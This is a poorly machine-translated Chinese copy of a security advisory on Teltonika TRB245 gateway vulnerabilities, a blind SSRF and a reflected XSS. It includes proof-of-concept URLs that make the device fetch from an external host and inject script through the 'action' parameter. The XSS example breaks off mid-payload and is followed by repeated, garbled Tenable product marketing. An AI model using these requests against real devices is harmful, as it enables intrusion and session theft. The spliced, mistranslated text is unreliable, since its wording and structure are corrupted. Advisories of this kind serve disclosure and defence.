Teltonika网关TRB245多重易变性
中度简表
CVE-2020-5784:盲服务器请求仿真
CVSSv3基准分数:5.4
CVSSv3 Vector: (AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L)
ser/lib/lua/luci/controler/packages.lua允许低特权用户从外部网络设备下载文件到设备
这是因为pkg#link受用户控制,然后直接传递到卷发命令中,而无需验证它归Teltonika域允许用户驱动程序向任意URL发送请求
![](http://www.yyueer.com/sites/drupal.dmz.tenablesecurity.com/files/files/advisory/tra307-1.png)
概念证明
浏览下方URL时,我们可请求外部URL下载设备
http://192.168.1.5/cgi-bin/luci/admin/services/packages/packages/check_sig?pkg_link=http://192.168.1.135:8000/ssrf&pkg_pkg=tlt_custom_pkg_easycwmp&pkg_name=TR-069&action=install
注意测试时需要更新目标路由器和外部设备IP地址
![](http://www.yyueer.com/sites/drupal.dmz.tenablesecurity.com/files/files/advisory/tra307-2.png)
文件通过SERF下载设备
注意用户组默认可实现此目标
在一个测试中,我下载了一个大文件 严重影响设备性能/可用性
CVE-2020-5785反射跨线程
CVSSv3基准分数:6.1
CVSSv3 Vector: (AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N)
发现有可能通过插入HTTPGET或POST请求中的HTML脚本标签攻击者可能利用它欺骗拥有更高特权的用户触发跨点脚本并窃取会议细节
概念证明
示例1“动作”浏览下文URL时,用户浏览器将执行javascript,从下文截图中可以看到这一点。
http://192.168.1.5/cgi-bin/luci/admin/services/packages/packages/check_sig?pkg_link=https://wiki.teltonika-networks.com/wikibase/images/8/8d/Networking_trb2xx_manual_packages_azure_iothub_2020-07-09.ipk&pkg_pkg=tlt_custom_pkg_easycwmp&pkg_name=TR-069&action=">可耐受脆弱性管理
前称Tenable.io
完全访问现代云型脆弱管理平台,使你能够以不匹配精度看到并跟踪所有资产
可租易容性管理实验中也包括可租可租Lumin、可租WebApp扫描和可租云安全
可耐受脆弱性管理
前称Tenable.io
完全访问现代云型脆弱管理平台,使你能够以不匹配精度看到并跟踪所有资产购买你年度订阅今天
试可穿Nessus专业免费
免费7天TenableNessus是当今市场最全面的脆弱感扫描器
New-Nessus专家
现可用奈苏斯专家增加更多特征,包括外部攻击表面扫描能力以及添加域和扫描云基础设施能力点击这里尝试Nessus专家
填表后继续使用NessusPro测试
可买Nessus专业
TenableNessus是当今市场最全面的脆弱感扫描器可租Nessus专业程序帮助脆弱性扫描自动化,在守法周期中省时并允许你加入IT团队
购买多年度许可证并保存添加高级支持访问电话、社区聊天支持全天365天全天24小时
完全访问现代云型脆弱管理平台,使你能够以不匹配精度看到并跟踪所有资产
可租易容性管理实验中也包括可租可租Lumin、可租WebApp扫描和可租云安全
付费完全访问现代云型脆弱管理平台,使你能够以不匹配精度看到并跟踪所有资产购买你年度订阅今天
可租WebApp扫描试
前称Tenable.ioWeb应用扫描
完全存取最新网络应用扫描服务 设计现代应用安全扫描全在线组合漏洞高精度而不人工重创或干扰关键网络应用现在就签名
可租WebApp扫描实验中也包括可租易用性管理、可租可租鲁明和可租云安全
试可腾鲁明
可视化并探索接触管理,跟踪随时间推移降低风险,并参照Tenablelumin对等基准
可点Lumin测试中也包括可点易点管理、可点WebApp扫描和可点云安全
可买路明
联系销售代表,看可租Lumin如何帮助你在整个组织中获取洞察力并管理网络风险
感恩节
感谢您对TenableLumin的兴趣很快就会有位代表联系
请求演示可租安全中心
前称Tenable.sc
请用联系方式填表
销售代理很快会联系你 调度演示*需要字段
请求演示TenableOT安全
前称Tenable.ot
获取操作技术安全你需要
降低风险你不必请求演示可租身份接触
前称Tenable.ad
持续检测响应主动目录攻击非代理商无特权
即时和云中联系人a购买可租云安全
联系销售代表了解更多可耐云安全知识,并观察多易登录云账号并在分钟内为云误配置和漏洞获取可见度
感恩节
感谢你对Tenable.cs的兴趣很快就会有位代表联系
看吧
可租一号
内行动暴露管理现代攻击面
可点攻面管理操作
前称Tenable.asm
了解平台上所有资产曝光
感恩节
感谢你对可点攻面管理的兴趣很快就会有位代表联系
买可租Nessus专家
内苏斯专家为现代攻击面搭建,使你能够看到更多并保护组织从IT到云的漏洞